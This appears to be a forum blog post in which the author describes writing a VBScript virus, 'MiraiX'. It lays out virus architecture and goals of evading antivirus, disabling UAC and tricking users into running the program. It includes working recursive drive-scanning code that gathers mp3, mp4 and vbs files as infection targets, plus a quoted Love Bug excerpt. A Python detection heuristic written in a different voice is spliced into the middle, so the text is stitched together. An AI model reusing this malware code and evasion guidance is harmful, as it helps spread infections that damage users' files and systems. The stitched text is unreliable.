As is customary, let me start by recommending a song to you all.
Anyway,
after the infectious VBScript I shared with you last time,
I went on extending MiraiX with other features,
including a few custom functions for scanning drives and files,
trying to finish a piece of malware with a "complete architecture" on my own.
Well, as it tur~ned~ out~
I found all of this to be unexpectedly difficult, I tell you~ OwO
Originally I figured that
since I could write the key code for the virus part,
assembling the various features together
surely couldn't be that hard,
right? Surely that's how it is, right?
Bu~t~ then I found that the assembly is where the real difficulty lies.
How do you assemble it correctly and execute each function in stages
so that it effectively evades antivirus (AV) scanning?
And how do you disguise or cover the malware's main program
so that the user ends up running the virus without noticing?
All of these key techniques
were the bottlenecks I ran into while assembling the virus.
Afterwards I looked up a lot of material
to study the architecture and related concepts a computer virus needs.
First, a virus can be divided architecturally into two main bodies:
1. search routine (the cycle and design of file scanning)
2. self-replication (self-copying and file infection)
The search algorithm and completeness of the search routine
affect how many files self-replication infects,
as well as the scope, speed and depth the virus can reach.
The leaner the self-replication code,
the lower the probability of being detected by AV,
but at the same time it is limited to infecting a single type of file,
which restricts the scope of infection.
Self-replication usually comes with anti-detection mechanisms,
including disabling/attacking antivirus software, disabling UAC, and disguise.
It's seriously so cool, I tell you,
that completeness, it's practically like a little living creature.
As for the remaining details, please refer to 虛鹿 (Falsedeer)'s notes:
Treat this part as an appendix;
I'll also share MiraiX's file-scanning design with you,
so that fellow Bahamut users interested in virus development can take a look.
[#] Excerpt of MiraiX's file-scanning code:
Rem MiraiX Ver0.1.0(VBScript Ver.)
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
'target file extensions for infection
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array() 'holds every file whose extension matches a target
Function AddItem(arr,val) 'append val to the array and return the grown array
    ReDim Preserve arr(UBound(arr)+1)
    arr(UBound(arr)) = val
    AddItem = arr
End Function
Function scandisk(path) 'main scan routine: walk all files/folders under path, looking for target extensions
    Dim ext, y, file, folder
    For Each file In scanfile(path) 'files
        ext = fso.GetExtensionName(file)
        ext = LCase(ext)
        For Each y In tgt_ext
            If StrComp(ext,y,1) = 0 Then
                runway = AddItem(runway,file)
            End If
        Next
    Next
    For Each folder In scanfolder(path) 'folders
        scandisk folder 'recurse into each subfolder
    Next
End Function
Function scanfile(folder_) 'return the files directly under folder_ as an array of paths
    Dim file:file = Array() 'array for the returned files
    Set fhandler = fso.GetFolder(folder_)
    Set files = fhandler.Files
    For Each file_ In files
        file = AddItem(file,file_.Path)
    Next
    scanfile = file
End Function
Function scanfolder(folder_) 'return the subfolders of folder_ as an array of paths
    Dim folder:folder = Array() 'array for the returned subfolders
    Set fhandler = fso.GetFolder(folder_)
    Set folders = fhandler.SubFolders
    For Each sub_ In folders
        folder = AddItem(folder,sub_.Path)
    Next
    scanfolder = folder
End Function
If you want to scan a particular drive,
you can use call scandisk("C:\")
to load the target files to be infected into the runway() array.
My original idea was to modularize each feature
so the program could be reused and rewritten more easily in the future.
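From the defender's side, the search-routine shape described above (FileSystemObject, an extension filter, a routine that recurses into SubFolders, error suppression, a start at a drive root) is exactly what a triage script can look for in .vbs files. The following Python heuristic is an added example, not code from the original post; the two sample scripts it checks are constructed here, not taken from MiraiX or the Love Bug.

```python
import re
# Constructed sample VBScript inputs (not from the original post or any real
# sample). BENIGN lists one folder; SUSPECT has the search-routine shape the
# post describes: a Sub that filters by extension and recurses into SubFolders.
BENIGN_VBS = """Set fso = CreateObject("Scripting.FileSystemObject")
For Each f In fso.GetFolder("C:\\Logs").Files
    WScript.Echo f.Name
Next
"""
SUSPECT_VBS = """On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Sub walk(p)
    For Each f In fso.GetFolder(p).Files
        If LCase(fso.GetExtensionName(f)) = "vbs" Then WScript.Echo f
    Next
    For Each d In fso.GetFolder(p).SubFolders
        walk d
    Next
End Sub
walk "C:\\"
"""
# One Sub/Function from its header line through its matching End line.
ROUTINE_RE = re.compile(r"^[ \t]*(?:Sub|Function)[ \t]+(\w+)[ \t]*\(.*?"
                        r"^[ \t]*End[ \t]+(?:Sub|Function)", re.I | re.M | re.S)

def self_recursive_routines(src):
    # A routine whose body names itself is the recursive directory walk.
    hits = []
    for m in ROUTINE_RE.finditer(src):
        name = m.group(1)
        body = m.group(0).split("\n", 1)[1]  # drop the declaration line
        if re.search(r"\b%s\b" % re.escape(name), body, re.I):
            hits.append(name)
    return hits

def search_routine_indicators(src):
    # Each indicator is one piece of the scan shape the post describes.
    low = src.lower()
    return {
        "filesystemobject": "scripting.filesystemobject" in low,
        "extension_filter": "getextensionname" in low,
        "subfolder_walk": ".subfolders" in low,
        "recursive_routine": bool(self_recursive_routines(src)),
        "error_suppression": "on error resume next" in low,
        "drive_root_start": re.search(r'"[a-z]:\\?"', low) is not None,
    }

def score(src):
    # Count of indicators present; all six is the full recursive-walk pattern.
    return sum(search_routine_indicators(src).values())
```

Run it over a directory of collected .vbs files and sort by score; a benign one-folder listing scores 1 here while the recursive walker scores 6.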
UMU!!
Next, let's look at the code the famous Love Bug (a VBS virus)
used to scan files.
[#] Excerpt of the Love Bug's code:
Set fso = CreateObject("Scripting.FileSystemObject")
sub scan(folder_)
    On Error Resume Next
    set folder_ = fso.getfolder(folder_)
    set files = folder_.files
    for each file in files
        ext = fso.GetExtensionName(file)
        ext = lcase(ext)
        if ext = "mp5" then
            '~ file infection code ~
        end if
    next
    set subfolders = folder_.subfolders
    for each subfolder in subfolders
        scan(subfolder)
    next
end sub
Ugh, ∑(゚Д゚)
It really is short and punchy……
Is this what they call the gap in skill? QAQ